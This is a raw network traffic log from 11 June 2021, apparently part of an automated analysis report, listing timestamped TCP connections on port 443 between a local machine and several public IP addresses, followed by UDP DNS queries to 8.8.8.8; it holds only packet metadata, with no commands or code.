                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.082550049 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.082705021 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.082731962 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.082825899 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.085123062 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111195087 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111216068 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111232042 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111251116 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111268044 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111285925 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111304045 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111340046 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.111391068 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.176282883 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.247385025 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.247453928 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.247503042 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.247545958 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.247556925 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.247606039 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.247683048 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.290400028 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.290458918 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.290498018 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.290535927 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.290561914 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.290620089 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.290668964 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.333414078 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.333472967 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.333501101 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.333630085 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.333683968 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.359563112 CEST49770443192.168.2.313.224.187.69
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.376324892 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.403301954 CEST4434977013.224.187.69192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.403466940 CEST49770443192.168.2.313.224.187.69
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.419054985 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.419167042 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.526283026 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.526408911 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.526633978 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.834317923 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:04.877509117 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:05.104896069 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:05.105279922 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:05.403074980 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:05.457024097 CEST44349774104.16.148.64192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:05.457165003 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:05.868839979 CEST4434978015.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:05.869049072 CEST49780443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.061016083 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.112931013 CEST44349774104.16.148.64192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.113050938 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.128273010 CEST49777443192.168.2.3104.20.184.68
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.179224014 CEST44349777104.20.184.68192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.435875893 CEST44349777104.20.184.68192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.435924053 CEST44349777104.20.184.68192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.435983896 CEST49777443192.168.2.3104.20.184.68
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.436039925 CEST49777443192.168.2.3104.20.184.68
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.440881014 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.490744114 CEST44349774104.16.148.64192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.490879059 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.580430984 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.638382912 CEST44349774104.16.148.64192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.638482094 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.663978100 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.664139986 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.706541061 CEST44349774104.16.148.64192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.716068029 CEST44349774104.16.148.64192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.716162920 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.723262072 CEST44349774104.16.148.64192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:06.723408937 CEST49774443192.168.2.3104.16.148.64
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.215761900 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.287060976 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.287332058 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.605946064 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.606061935 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.606836081 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.607237101 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.607604027 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.608705997 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.608820915 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.649023056 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.649051905 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.657783031 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.659674883 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.659698009 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.660090923 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.661854029 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.662271023 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.662317038 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.662375927 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.666755915 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.684374094 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.684405088 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.684487104 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.684648991 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.684710026 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.720191002 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.723237991 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:07.723325014 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:09.167418957 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:09.212057114 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:09.212081909 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:09.219919920 CEST4434973613.225.74.123192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:09.220047951 CEST49736443192.168.2.313.225.74.123
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:10.537255049 CEST44349759169.47.124.25192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:10.537302971 CEST44349759169.47.124.25192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:10.537388086 CEST49759443192.168.2.3169.47.124.25
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:10.537483931 CEST49759443192.168.2.3169.47.124.25
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:16.104978085 CEST4434978015.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:16.105181932 CEST49780443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:17.797864914 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:17.800776958 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:25.752319098 CEST4434978015.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:25.752701998 CEST49780443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:28.165965080 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:28.166271925 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:30.752480030 CEST4434978015.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:30.752686024 CEST49780443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:31.751935005 CEST4434978015.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:31.751981974 CEST4434978015.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:31.752147913 CEST49780443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:31.752563000 CEST49780443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:31.804430008 CEST4434978015.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:37.721759081 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:37.721944094 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:42.722481012 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:42.724755049 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:43.722683907 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:43.722732067 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:43.723012924 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:43.724806070 CEST49781443192.168.2.315.236.176.210
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:43.776283026 CEST4434978115.236.176.210192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:45.506712914 CEST44349758169.47.124.25192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:45.506758928 CEST44349758169.47.124.25192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:45.506840944 CEST49758443192.168.2.3169.47.124.25
                                                                                                                                                                                                                                                        Jun 11, 2021 10:41:45.506879091 CEST49758443192.168.2.3169.47.124.25

                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:11.887558937 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:11.937467098 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:14.042583942 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:14.092966080 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:21.801464081 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:21.816705942 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:21.861926079 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:21.879523993 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:22.836148024 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:22.836229086 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:22.897349119 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:22.899215937 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:23.883187056 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:23.883276939 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:23.943908930 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:23.946171999 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:25.932111979 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:25.932157993 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:25.991391897 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:25.993674040 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:29.798913956 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:29.850461006 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:29.994689941 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:29.994798899 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:30.047950029 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:30.053685904 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:30.695847034 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:30.749406099 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:31.613392115 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:31.666630983 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:32.498750925 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:32.552016020 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:32.891803026 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:32.972542048 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:33.374037027 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:33.424731970 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:34.182487965 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:34.233170033 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:35.218832016 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:35.270080090 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:36.102462053 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:36.161194086 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:36.964030981 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:37.014481068 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:37.863528967 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:37.924314022 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:38.385230064 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:38.435683012 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:39.647609949 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:39.698771954 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:41.298959017 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:41.352386951 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:42.090192080 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:42.140913010 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:42.957906008 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:43.011218071 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:43.743139029 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:43.796427011 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:44.567112923 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:44.627648115 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:55.267949104 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:39:55.334698915 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:02.901074886 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:02.984978914 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:09.754539013 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:09.826435089 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:13.798511982 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:13.859103918 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:14.119606972 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:14.191540003 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:16.994467974 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.057204008 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.501697063 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.565608978 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.793529034 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:17.855024099 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.395910978 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.446257114 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.511737108 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:18.574915886 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:19.530021906 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:19.593228102 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:40.645037889 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:40.707321882 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:43.826235056 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:43.886996984 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.888362885 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.925647974 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.938487053 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.980153084 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.983550072 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:44.993217945 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.042342901 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.049305916 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.749238968 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.813124895 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.937753916 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:45.997876883 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.021346092 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.079886913 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.335987091 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.403497934 CEST53571458.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:47.068310976 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:47.127098083 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:47.930043936 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:47.988598108 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.434787989 CEST5535953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.479218960 CEST5830653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.499056101 CEST53553598.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.547401905 CEST53583068.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:49.115597010 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:49.167922974 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:50.724638939 CEST6412453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:50.787004948 CEST53641248.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:51.944402933 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:52.005476952 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.116153002 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.176492929 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.789433002 CEST4936153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.852684975 CEST53493618.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.620053053 CEST6315053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.650521994 CEST5327953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.680588961 CEST53631508.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.712351084 CEST53532798.8.8.8192.168.2.3
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.037878036 CEST5688153192.168.2.38.8.8.8
